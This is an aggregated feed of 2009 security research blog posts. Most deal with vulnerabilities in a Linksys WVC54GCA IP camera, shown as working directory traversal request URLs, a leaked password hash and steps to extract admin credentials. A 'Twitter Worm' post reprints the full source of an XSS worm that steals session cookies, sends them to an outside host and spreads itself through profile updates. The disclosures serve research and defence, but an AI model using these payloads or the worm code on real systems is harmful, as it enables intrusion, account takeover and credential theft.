 Today, instead of releasing just one vulnerability I’ll be releasing two! These two vulnerabilities have helped me understand more about how the WVC54GCA wireless camera internals and I’m hoping they will also work on other Linksys camera models. Please let me know if you successfully test them on other models too!
 
 Both vulnerabilities are of type directory traversal, aka arbitrary file retrieval, and they both affect the same CGI program: /adm/file.cgi. Please note that these vulnerabilities are different to CVE-2004-2507/BID 10476 which affected /main.cgi instead.
 1st directory traversal hole
 It seems that the next_file parameter is not filtered enough when submitted to /adm/file.cgi, so that either of the following requests will return the content of any file whose location is known (/etc/passwd in this case):
 /adm/file.cgi?next_file=%2fetc%2fpasswd
/adm/file.cgi?next_file=%2fetc/passwd
/adm/file.cgi?next_file=%2e.%2f%2e.%2f%2e.%2f%2e.%2fetc%2fpasswd
 2nd directory traversal hole
 In the case of the second directory traversal hole, the vulnerable parameter (this_file) is not filtered at all whatsoever. So hex-encoding special symbols is not required:
 /adm/file.cgi?todo=pwnage&this_file=/etc/passwd
 The following is the content of the Linux passwd file containing the encrypted root password. Remember that the WVC54GCA comes with BusyBox Linux by default which you can confirm by opening bin/busybox with any of the vulnerabilities previously discussed. I’m curious to know if the passwd file contains the same password on all cameras of the same model, or even if Linksys is also using the same password on other models:
 root:9szj4G6pgOGeA:0:0:root:/root:/bin/sh
 Notice that when exploiting the first vulnerability, we need to convert forward slashes to %2f which is its hex-encoding equivalent. This is because the developer (poorly) attempted to filter directory traversal sequences when data is submitted via the next_file parameter. In the third example, we also partially hex-encode ../ sequences in order to avoid being blocked by the script which results in a forbidden error.
 Needless to say, if the root password is not too strong you should be able to crack it using john or you favorite password cracking tool. I loaded passwd with john for a few hours on an old laptop and nothing was found, so I’m guessing the root password is not extremely weak. If you model comes with the telnet daemon running by default, cracking that password should give you root shell access.
 Unfortunately, as I mentioned in the first post of these series, the WVC54GCA camera comes with a telnet daemon included, but it’s off by default. I haven’t managed to enable the telnet daemon and get a remote root shell yet although I suspect it might be possible by modifying the bin firmware image and uploading it again.
 What can we do with these vulnerabilities?
 Well, I tried finding files that contain interesting information that helps you understand the camera better. The following are some examples:
 
/etc/passwd : traditional-DES-format password file with no salt
/usr/local/www/img/.htpasswd : HTTP credentials stored in cleartext
/usr/local/www/adm/.htpasswd : contains same data as previous file
/etc/system.conf : all camera settings stored in cleartext including admin password, wifi encryption key, etc …
/usr/local/bin/thttpd.conf : web server config file confirming the daemon runs as root, which is the only system account present anyway
/etc/init.d/rcS : here we see the line that starts the telnet daemon (/usr/sbin/telnetd) commented out
/etc/def_sys.conf : camera’s default settings
/etc/system.conf : camera’s current settings
/var/nc.log : network connections logs
/etc/group
/etc/inittab
/proc/cpuinfo : processor details
/proc/meminfo
/proc/version : OS details
/proc/uptime
 Finding a file upload vulnerability should allow us to overwrite the /etc/init.d/rcS file and eventually manage to start the telnet server after reboot. By overwriting the /etc/passwd file with our own we should be able to add our own root password. Unfortunately, I haven’t discovered any vulnerability that would allow me to upload files to arbirary locations. If you do discover one, please let me know. I’d love to hear the details.
 Testing Info
 Directory traversal vuln #1 successfully tested on:

WVC54GCA
Firmware V1.00R22 and V1.00R24 (latest available as on 23rd April 2009)
 Directory traversal vuln #2 successfully tested on:

WVC54GCA
V1.00R24 (latest available as on 23rd April 2009)

Although I never tested the second traversal vulnerability on Firmware V1.00R22, I definitely suspect it will work on this previous firmware version as well.
Please note that the aforementioned vulnerabilities are different to BID 10476 which affected the /main.cgi program rather than /adm/file.cgi.
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Google Me
noreply@blogger.com (pdp) — Wed, 22 Apr 2009 06:48:00 -0700
Google revealed that the company will serve Personal Profiles via the search results. Probably not a big deal, but this yet another example of how far Web2.0 technologies will go. It will be interesting to see how everything will span out. The good thing is that your profile is not available to the public by default. You need to opt in.

I will most definitely be watching...


Hacking Linksys IP Cameras (pt 2)
Mon, 20 Apr 2009 15:27:14 -0700
This article is a continuation of the following GNUCITIZEN article, which includes an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1).
 Privilege escalation via arbitrary file retrieval
 The second vulnerability I’ll be releasing is an arbitrary(ish) file retrieval vulnerability. It’s not fully arbitrary because you can only retrieve the contents of files located within the same directory where the vulnerable CGI program is located. However, this is enough to allow a neat privilege escalation vector where a restricted user that only has permissions to view the video stream, can gain access to the admin account password.
 
 The problem lies within the next_file parameter which is submitted to the main.cgi program. Although main.cgi does filter characters typically used in directory traversal sequences such as dots (.) and forward slashes (/), it seems that the developer didn’t consider that retrieving the contents of files within the current directory could create a security hole. By simply retrieving the contents of .htpasswd a restricted user which only has permissions to access the video stream can access the credentials of the admin account and also the credentials of other restricted users (if applicable).
 The only restriction that needs to be bypassed, is dots (.) symbols being filtered. i.e.: the following will not work and will result in a forbidden error:
 /img/main.cgi?next_file=.htpasswd
 But replacing the dot (.) symbol with its hexadecimal equivalent:
 /img/main.cgi?next_file=%2ehtpasswd
 Will result in the contents of .htpasswd being returned. i.e.:
 admin:adminpassw0rd user1:pass1 user2:pass2
 Like most IP cameras, the Linksys WVC54GCA allows administrators to grant access to the video stream to selected users only (rather than anonymous users who don’t need to authenticate). In this case, the admin user can click on the Users menu and tick the Only users in database option (please see screenshot below). After this, all that is needed is to add a username/password pair for the account to grant video-viewing access to:
 
 Well, the feature discussed above can be rendered useless by exploiting the vulnerability I have described, since it allows restricted users to retrieve the admin password.
 Testing Info
 Successfully tested on:

WVC54GCA
Firmware V1.00R22 and V1.00R24 (latest available as on 20th April 2009)
 Please note that this vulnerability is different to BID 10476 which affected the /main.cgi program rather than /img/main.cgi.
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Hacking Linksys IP Cameras (pt 1)
Mon, 20 Apr 2009 00:40:35 -0700
During the easter break, I was playing with my my wireless Linksys IP camera which, although I bought several months ago, I hadn’t taken my time to give the attention this beauty deserves until now! :)
 The model in particular is the WVC54GCA, which I would say is one of the most affordable Wi-Fi IP cameras out there (about GBP 80 in the UK), making it a great toy to tinker with.
 
 I found the camera to be quite good functionalities-wise, although I’ve experienced availability problems with it. It seems the camera freezes every once in a while. Well, this is true at least when you heavily customized its configuration which is what I’ve ultimately done after playing so much with it.
 I’ve loved playing with embedded devices for a while, and as a security researcher I find it quite an interesting topic as many de facto security principles that are usually (attempted to be) followed when designing other types of systems are not often applied to embedded devices. This, I believe is due to lack of limitations in hardware resources, and lack of awareness on consequences of getting a miscellaneous device compromised. i.e.: who cares if my IP camera gets owned?
 During the next days, I’ll be posting some vulnerabilities I’ve found. Some of them are fun and serious, while others you might find kind of boring.
 Meet the target
 You can learn a lot about the specs of a device by simply reading the product’s literature. However, sometimes not enough info is provided in these documents. The following are some of the specs I confirmed by interacting with the camera in various ways:
 
CPU: Faraday FA526id(wb) rev 1 (v4l) according to /proc/cpuinfo
OS: Linux version 2.4.19-pl1029 according to /proc/version plus Busybox (confirmed as the file /bin/busybox exists on the filesystem)
HTTPD: thttpd 2.25b (extracted from banner returned on default html error pages and ‘Server:’ HTTP headers)
Memory:30908 kB (32 MB?) according to /proc/meminfo
Firmware Version: V1.00R22 and V1.00R24 (latest version available as on 16th April 2009)
 It also comes with a telnet daemon (/usr/sbin/telnetd) but unfortunately for hackers out there, the daemon is disabled as the following line is commented out on /etc/init.d/rcS:
 # ---- Start Telnet Server (debug) ---- #

#/usr/sbin/telnetd &
 I have not yet managed to get a remote root shell by enabling the telnet daemon but have found some vulnerabilities which might help accomplishing this goal. I will be releasing these vulnerabilities in the next days. Please let me know if you know how to enable the telnet daemon on Linksys IP cameras! Ideally, I’d like to accomplish this without physically connecting to the camera or flashing the firmware.
 Remote admin compromise by unauthenticated attackers due to wizard design error
 I found this vulnerability while investigating CVE-2008-4390. I wanted to know if CVE-2008-4390 affected my camera, even though it was reported to affect a different Linksys IP camera firmware and model. The CVE entry states:
 The Cisco Linksys WVC54GC wireless video camera before firmware 1.25 sends cleartext configuration data in response to a Setup Wizard remote-management command, which allows remote attackers to obtain sensitive information such as passwords by sniffing the network.
 So I started trying to figure out if the WVC54GCA also discloses sensitive information when communicating with the wizard. According to the vendor, the issue has been fixed:
 Solution: 2300 and 210 have encrypted data and have no such issue. To decode the data, an administrator username/password is a MUST.
 At first sight, when capturing the traffic between the wizard and the cam, I couldn’t see the data traveling in human readable form. While trying to figure out how the data is sent over the network (i.e.: encoded/encrypted), I realized there was something seriously wrong with the handshake mechanism.
 The following is a very generic (and possibly inaccurate) description of the handshake
 
Wizard (SetupWizard.exe) sends UDP request to 255.255.255.255:916
Camera responds back to 255.255.255.255 using the DCERPC protocol and presents itself with identity info such as the value of the ‘defname’ variable which looks like LKXXXXXX, where ‘X’ is a hex digit. This identity info is picked up by SetupWizard.exe. Some of this info such as MAC address, IP address and subnet mask is shown in the wizard.
From now on, SetupWizard.exe uses the camera’s ‘defname’ variable when talking to it, so that the camera knows what requests submitted to 255.255.255.255:916 it should respond to.
 At this point the wizard “has discovered” the camera and the user can go through the setup procedure. For security reasons, the user needs to enter the admin username and password, before the setup process can start. Otherwise anyone could make changes to the camera without authenticating.
 Now, here is the important bit. If you capture the network traffic while running SetupWizard.exe, you’ll notice that when the user is asked to enter the admin username and password after the camera is discovered, there are NO requests sent from the wizard to the camera in order to verify that the entered username/password combination is correct! 
 “How is this possible? What the heck is going on?!” I thought. I was terrified to confirm my worst fear: the wizard already “knows” the camera’s admin username and password at this point, thus there is no need to ask the camera again. Indeed, at this point – before the user enters the admin username and password that is – the camera’s credentials are already loaded into the memory of the SetupWizard.exe process. This is because the camera has previously transfered the admin credentials along with other configuration data!
 In case I didn’t explain myself properly I’ll summarize the issue by saying that the camera transfers the admin username and password to the wizard before the user enters them.
 The following steps demonstrate how an unauthenticated attacker can remotely obtain the camera’s admin username and password:
 
Download the setup wizard. You might need to download a different wizard if you want to test this vulnerability on a different Linksys IP camera model
Run SetupWizard.exe
Click on “Click Here to Start” / “Setup Camera” / “Next” (after accepting EULA) / “Next” (4 more times in total)
The discovery process is quite flaky, so if the wizard hasn’t found your camera yet, click on “Search Again” as many times as required until it works
You should now see your camera’s name under the “Camera List” column and also various configuration data under the “Status” column:

You now need to dump the process memory of SetupWizard.exe using your favorite tool:

Then open the memory dump file using your favorite hex editor
Now you can either search for “admin” and find the admin password after a few null bytes, or tell your hex editor to go to decimal position 75058 (”Address” / “Goto …” menu on XVI32). In my case the admin password would always fall within this position:


Have fun! (the most important step really)
 It is somehow ironic that a free tool provided by the vendor of a product can be used as a “hacker” tool against their own product.
 As far as I know, this vulnerability cannot be exploited over the Internet, since the camera only responds to wizards located in the same LAN. Never say never though, so if you find a way to exploit this vulnerability over the Internet, please contact us.
 UPDATE: CPU and additional OS info added.
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



It is All About People Manipulation Skills
Sun, 19 Apr 2009 02:15:05 -0700
On the 14th this month, Computerworld published an interesting article titled ‘Mafiaboy’ spills the beans at IT360 on underground hackers. Interesting read but nothing too exciting.
 
 The article is yet another proof that we are all in big trouble. Simply put, the technology will continue to develop and the majority of people wont be able to keep up. As long as the situation remains the same, people and corporations will get exploited regardless how tight their security is. It is inevitable. At the end of the day, it is all about people, not technology.
 Social engineering skills has been a major part of the hacker’s toolkit for ages and the situation is unlikely to change. The humans are still the weakest link and that is something that can only be fixed through education and by continuously rising awareness.
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Mikeyy Returns
noreply@blogger.com (pdp) — Fri, 17 Apr 2009 13:44:00 -0700
According to Mashable, the Mikeyy twitter worm has returned.



I am personally not surprised. Given the ease of finding XSS vectors nowadays it is more surprising that we haven't seen massive XSS outbreaks everywhere.

XSS attacks and worms will become more and more relevant as the web expands because they are defacto the equivalent of buffer overflows in the software security world.

I think that talked about these stuff 4-5 years ago.


Exploit Development Framework Design
Thu, 16 Apr 2009 02:40:15 -0700
Perl, Ruby Python: use the language that suits your character. However, one of the things that differentiate python from the rest is its philosophy, which is: there should be one– and preferably only one –obvious way to do it (where it is a problem). This philosophy gives python some interesting advantages over other similar languages. That will be explained later on.
 
 This post is merely a summary of my research work on how to build a better exploitation framework ala metasploit-style.
 The Problem
 Metasploit is great but there are three things that makes the framework sometimes inconvenient: it’s size, it’s dependency of the ruby platform and of course it’s speed. It will be great if for example we can take a single exploit (or a set of exploits) out of the framework and compile it into a standalone executable. On the advantage side, this type of solution will also allow us to ship the framework as a payload to already compromised systems and use it from there as a stepping stone for further propagation. It will also allows us to run exploits from compromised embedded devices as long as we can compile for their architecture, which is pretty cool.
 I understand that it is possible to bundle the entire framework plus the ruby environment into one executable but such a solution is simply not elegant enough and not fully cross-platformed.
 Introduction
 Back in the days when Metasploit was written in Perl, there were a few other frameworks trying to do similar things but in C and C++. A solution based on C or C++ is a lot more interesting as it allows us to compile standalone versions of the framework and use them as we wish. It simply makes the framework very good for embedding and also quite suitable for delivering it as a payload to the systems we would like to compromise.
 Nowadays, a C and C++ solution is often doomed to failure. The reason for this is because when building a framework you can easily get into a situation where you need to solve a pretty complicated problem. Both C and C++ lack the dynamicism and the degree of expression available in languages such as perl, python and ruby and therefore, while they remain very suitable for low level stuff, they start to loose their grounds when it is needed to build something that is more abstract and high level.
 Some Solutions
 Keeping all of the above in mind I started putting words into practice. In the spirit of a zen monk, I started thinking which parts of the metasploit framework are most valuable to a penetration tester so that they can be branched out. As it happens, the obvious answer is: the exploits. The Auxiliary modules are great but they represent functionalities which are already available in other tools. So, the first idea was to take the exploits and payloads out and rewrite them into something that is more suitable.
 I decided to see for myself if I can prototype a simple exploitation framework in C++ that all it should so is to implement several abstract interfaces for exploit development, a a class with common methods for payloads (empty of course) and of course a simple interface to run an exploit with a payload against a target. All of this was achieved in a hello world fashion exploiting a simple stack overflow on a proggie from the command line and of course without the need to circumvent any protection mechanisms in place.
 Although I was pleased with the result of the prototype, I was not convinced that this is a good enough solution. Programming in C++ is fun, especially when you haven’t done it for a couple of years, but still not as practicle as I would like it to be. We can most certainly build a DSL on the top of C and C++ by using Preprocessor Directives but when you are developing an exploit you want to make the process as painless as possible and C directives are only making it worse when hunting for a bug in the exploit. Not to mention that compiling something every time you make a change is not cool at all.
 Being a pythonist and knowing the python mantra inside out, I thought that it should be possible to write all of the exploits and payloads in python and convert them into C or C++ at later stage as long as I stick to using a minimal set of the language features which can be directly translated with regexes and some basic parsing. After all, python looks like an executable pseudo code. Luckily for me, such a solution already exists and it is called shedskin.
 Now shedskin is a lot more than a simple python to C++ translator. Not only it can convert a python program to C++ source but it also implements all of python’s builtins and it has support for some of python’s most useful modules such as re and socket. On the top of that, it is trivial to implement additional modules to the shedskin framework in python. This is a product I will happily pay for!
 Analysis
 I played quite a lot with the shedskin compiler tweaking things as I go. Although the parser is pretty advanced there are some restrictions enforced on the language. All of them are nicely covered in the shedskin’s tutorial.
 It was time to see if I do need the advanced python features for developing the exploits. I run through all Metasploit payloads and exploits and a pattern started to emerge. The majority of the exploits were pretty basic. They all came down to the following algorithm more or less:
 
Select an exploit
Pack a structure/payload that will be sent over a socket or will be dumped into a file
Send/Save the payload
 Obviously, there is no need for python sugar to implement that.
 The Design
 I did quite a lot of work investigating the best approach to tackle the problem of creating a good enough exploitation framework and I came up with the following basic idea:
 We start with the same basic building blocks as found in metasploit. We need abstract classes for Exploits and Shellcodes and also classes that implement them to define more functional classes such as those that needs to be implemented when writing remote exploits for example (socket stuff). We use the basic python capabilities keeping shedskin in mind. As I mentioned, shedskin is quite advanced so most of the functionalities can be implemented without even taking it into consideration at all.
 That will provide the core of the framework. All of the exploits now can be written on the top of this. The exploits themselves should reuse as much as of the builtin methods as possible as that their portability will be guaranteed.
 A layer above that, we write as much as python sugar as we want. We simply don’t care how we are going to write it because that part of the framework doesn’t have to be compiled.
 In summary, we layer the whole thing like that:
 
Layer 01. Core Exploit Development Classes implementing the most basic set of python features
Layer 02. Exploits implementing the Core Exploit Development Classes
Layer 03. Python sugar to glue it all together
 Conclusion
 So, it is possible to write a good and well-designed exploitation framework in python that allows exploits to be separated and compiled in standalone native executables. Not only that, but we do not sacrifice from the dynamicism of the python language as while the core will be written in basic python, the rest will be as dynamic as we want. Imho, this is all possible due to python’s mantra that there should be one– and preferably only one –obvious way to do it. It just makes it easier to write briliant tools such as shedskin.
 Although I am quite excited to start writing such a beast right a way, I am going to pass this time. I am starting to learn to say NO because I’ve got far too many things on my plate already. However, if anyone is interested in working on this, I will be very happy to facilitate the project as much as I can and give a hand where necessary.
 I am very interested to hear your opinion and I am even more interested to get the opinion of the Metasploit team as they have a lot more experience in coding exploitation frameworks than me.
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Twitter Worm
noreply@blogger.com (pdp) — Wed, 15 Apr 2009 01:41:00 -0700
As I've already mentioned on the GNUCITIZEN blog, Twitter has been hit by the same worm twice. The worm is similar in nature to the infamous Samy XSS Worm which hit MySpace in 2005 but a lot less severe. This is yet another example that XSS worms could and will be used as a propagation mechanism for more sever types of malware.

For those who are curious, here is a the complete worm code:

function XHConn()
{
 var xmlhttp, bComplete = false;
 try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
 catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
 catch (e) { try { xmlhttp = new XMLHttpRequest(); }
 catch (e) { xmlhttp = false; }}}
 if (!xmlhttp) return null;
 this.connect = function(sURL, sMethod, sVars, fnDone)
 {
 if (!xmlhttp) return false;
 bComplete = false;
 sMethod = sMethod.toUpperCase();
 try {
 if (sMethod == "GET")
 {
 xmlhttp.open(sMethod, sURL+"?"+sVars, true);
 sVars = "";
 }
 else
 {
 xmlhttp.open(sMethod, sURL, true);
 xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
 xmlhttp.setRequestHeader("Content-Type",
 "application/x-www-form-urlencoded");
 }
 xmlhttp.onreadystatechange = function(){
 if (xmlhttp.readyState == 4 && !bComplete)
 {
 bComplete = true;
 fnDone(xmlhttp);
 }};
 xmlhttp.send(sVars);
 }
 catch(z) { return false; }
 return true;
 };
 return this;
}
 
function urlencode( str ) {
 var histogram = {}, tmp_arr = [];
 var ret = str.toString();
 
 var replacer = function(search, replace, str) {
 var tmp_arr = [];
 tmp_arr = str.split(search);
 return tmp_arr.join(replace);
 };
 
 histogram["'"] = '%27';
 histogram['('] = '%28';
 histogram[')'] = '%29';
 histogram['*'] = '%2A';
 histogram['~'] = '%7E';
 histogram['!'] = '%21';
 histogram['%20'] = '+';
 
 ret = encodeURIComponent(ret);
 
 for (search in histogram) {
 replace = histogram[search];
 ret = replacer(search, replace, ret)
 }
 
 return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
 return "%"+m2.toUpperCase();
 });
 
 return ret;
}
 
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];
 
var cookie;
cookie = urlencode(document.cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'>");
 
function wait()
{
 var content = document.documentElement.innerHTML;
 
 authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
 var authtoken = authreg.exec(content);
 authtoken = authtoken[1];
 //alert(authtoken);
 
 var randomUpdate=new Array();
 randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
 randomUpdate[1]="Join www.StalkDaily.com everyone!";
 randomUpdate[2]="Woooo, www.StalkDaily.com :)";
 randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
 randomUpdate[4]="Wow...www.StalkDaily.com";
 randomUpdate[5]="@twitter www.StalkDaily.com";
 
 var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
 
 updateEncode = urlencode(genRand);
 
 var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
 
 var ajaxConn = new XHConn();
 ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
 var ajaxConn1 = new XHConn();
 ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
}
setTimeout("wait()",3250);



Even More XSS Worms
Sun, 12 Apr 2009 01:29:41 -0700
This morning I spotted several blog posts mentioning that Twitter has been hit by yet another XSS worm.
 
 There is no merit in discussing how this has been done and for what purposes but this incident is yet another proof that the attack landscape is rapidly changing and moving towards web enabled infrastructures and the client-side. Soon or later almost every website will be equipped with social capabilities (google’s own opensocial and friendconnect platforms) and than simple persistent XSS attacks will turn into quite nasty problems.
 Time will tell!
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Tools of Trade
Fri, 10 Apr 2009 13:18:31 -0700
I wish I had the ultimate tool, whether that is a programing language such as perl, python and ruby, or whether it is a framework like metasploit and vulnerability scanner like nessus. I wish, but I know that such thing doesn’t exist and probably never will.
 
 Lately I’ve been dropping a lot bash scripts on public forums and of course on work related projects. Many people came back to me asking why I chose bash. Python or perl would have been better! While I agree that both python and perl are a lot more expressive, I disagree that tools in general should be written just to accommodate the needs of a particular framework. Tools are tools and they have their lifetime just like everything else. So should we bother?
 Recently I had to communicate with a MSSQL server on a pentesting job. For that purpose I’ve downloaded sqsh. Unfortunately the tool failed with a linking error. So I decided to go and download the sources and compile. I did that but the build failed because my environment was lacking certain unusual environment variables the tool needed to build successfully. Alright, running out of time, I decided to check whether there are other tools for SQL server. I found dbishell which is a tool written in perl. Run the tool for Sybase backend but it complained that I am missing libraries. So I downloaded the dbi sybase perl libraries and installed them. I run the tool again but it failed with an error. It couldn’t display the error because I was lacking another perl library.
 Ok, that was ridiculous and I desperately needed a solution. So I came up with something I do not normally do. I checked PHP’s sybase integration online and I found that it is relatively straightforward to communicate with MSSQL backends from PHP scripts. I wrote a simple script to bruteforce the login with several passwords I had at hand. Once I found the login, lucky me, I wrote another script, again in PHP, just to dump various information from the database such as other database users and their hashes. Lucky me!
 In summary, I spent ridiculous amount of time trying to make established frameworks and tools to work while I could have saved all the hustle and started with PHP from the beginning.
 The reason I am telling you this story is because I have an important message convey here: Tools are just Tools! If metasploit cannot exploit the vulnerability perhaps you can create something yourself. If nessus fails to detect a problem, perhaps there is another approach you should use to handle the situation. We often start a new framework or tool and suddenly decide that it should handle all situations. Well that is virtually impossible! The situation always change.
 So, don’t stick to a single tool just because it works 80% of the time. And don’t waste time trying to make the tool work in the rest 20%. It is pointless, especially when you are dealing with frameworks. There are a lot more elegant solutions out there you can employ to solve your particular problem. These solutions may not be elegant and perhaps they are written in something as unconventional as brainfuck, but they are solutions nevertheless.
 Remember, tools solve problems! If a tool cannot solve the problem it is no longer a tool. It is a useless blob!
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



More Penetration Testing Goodness with Jeriko
Tue, 07 Apr 2009 14:14:29 -0700
Over the last couple of weeks I’ve added more features to the Jeriko toolkit which I briefly covered in my post over here. For those of you who don’t know, Jeriko is a compilation of various bash scripts to ease manual penetration testing practices. The idea is to automate only the things which are sort of boring.
 
 Anyway, now you have a few more scripts at your disposal. The most notable changes are the ability to discover service versions via extract-services, the ability to discover and generate URLs from services which offer HTTP (courtesy of generate-url-batch, expand-url-credentials and expand-url-dirs) and the ability to grab screenshots of all web servers via scan-browsers.
 Personally, I find the scan-browsers script extremely useful. Let’s say that you encounter a bunch of web servers but you don’t know what they are for. You can fire the browser and start executing URLs one after another but that will take time and you can easily get confused. Instead of doing that you can do the following:
 $ generate-url-batch | scan-browsers
 This command will iterate over each discovered HTTP server and take a screenshot of the front page. The script can be safely executed even in environments which do not have the X server installed. In fact, you do not need it at all, because the script relays on a virtual framebuffer server.
 After the command completes, you will have your current working directory populated with the screen grabs. Now you can use your default picture viewer to see all web servers quite rapidly. This script is also handy in pentests when you need to take evidence of particular vulnerable web servers/applications.
 Although Jeriko is already useful, I am planning to totally redesign the platform. Future versions will have more granular control over the pentesting process and the ability to automate large chunks of boring activities.
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



On Security Buzzwords
Fri, 03 Apr 2009 02:36:08 -0700
I’ve got quite a lot of good feedback on the security buzzword generator I announced yesterday. For those of you who do not know, the generator is a fun little utility part of the GNUCITIZEN campaigns which helps you with coming up with new and exciting buzzwords like a security pro.
 
 We often laugh when a new buzzword makes its rounds in the media but the matter of fact is that buzzwords are important. In essence, buzzwords are just terminology which happens to be used extensively by the media. I find it funny to follow rants of people who are obviously against buzzwords but they make use of buzzwords themselves. If you are against them, just don’t use them. I am curious to see how you are going to find a common language with the rest of the world.
 Here are a few examples of security buzzwords which are considered an everyday terminology nowadays:
 
Null Pointer Dereference
Cross-site Scripting
Rebinding Attacks
Botnets
Storm Worm
Virtualized Rootkits
there are tones more…
 They are buzzwords because at some point they were virtually all over the Web. Today’s buzzwords is Conficker. If you find something new and intriguing it most certainly will become a buzzword. Is that really that bad?
 Q&A with the Public
 I have a question to the public. Dear Reader, what do you call a script injection exploit which happens withing the boundaries of the browser’s chrome?
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



Security Buzzword Generator
Thu, 02 Apr 2009 04:27:25 -0700
In the light of the Month of New Security Buzzwords, I am releasing an online fuzzer to help you generate as many security buzzwords as you like. Sweet!
 
 Jokes aside, tools like this one are quite helpful to brainstorm new ideas. If you ever do research inspired by our buzzword generator, please give us a credit. That way we will know that the tool is actually useful.
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



No Frameworks but Environments
Wed, 18 Mar 2009 03:51:21 -0700
We certainly don’t need the ultimate pentesting framework but we can make use of the ultimate pen-testing environment.
 
 This is sort of pre-announcement of a tool I am currently working on, different from jeriko, which I hope will improve the way we do pentests. The tool is in its early stage of development and I could make use of several JavaScript coders if someone is up for the challenge.
---
gnucitizen information security gigs part of the cutting-edge network:
No active items found!
GNUCITIZEN Content Survey
---
recent posts from the gnucitizen cutting-edge network:
Websecurify Security Scanner v0.1 Sneak Peek
CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept
Next Stage
Hacking Linksys IP Cameras (pt 5)
Simple and Obvious



CONFidence 2009 coming up soon!
Sat, 14 Mar 2009 06:47:47 -0700
The new edition of CONFidence is coming up soon! CONFidence, which has become one of the biggest technical IT security conferences in Europe, is taking place on 15-16 May in the beautiful city of Krakow.
 
 This is the fifth year CONFidence is taking place, and there have been several changes introduced. First of all there will be two simultaneous tracks after lunch time, whereas previous editions only offered one track all day. Also, this year introduced the Hackers’ Squad, which sounds to me like a great idea for learning and having fun at the same time. The following is mentioned on the CONFidence website regarding the Hackers’ Squad:
 During 5th edition of CONFidence you have a unique chance to stay at the coolest spot in the city Hackers’ Squad. It is a place where hacking never stops!
 We decided to rent the whole hostel (or even group of hostels if it’s necessary) and turn it into the real hacking space a place to sleep, to party and to hack – only for CONFidence attendees.
 Last year pdp and I had a blast at the event, which we found to be one of the best organized security cons we’ve been too. To date, I can say that CONFidence and HITBSecConf – aka Hack in the Box – are probably my two favorite hacker events. Unfortunately, pdp won’t be speaking at CONFidence this year, but he will be busy presenting at other events such as AusCERT 2009.
 My humble talk on credit card theft
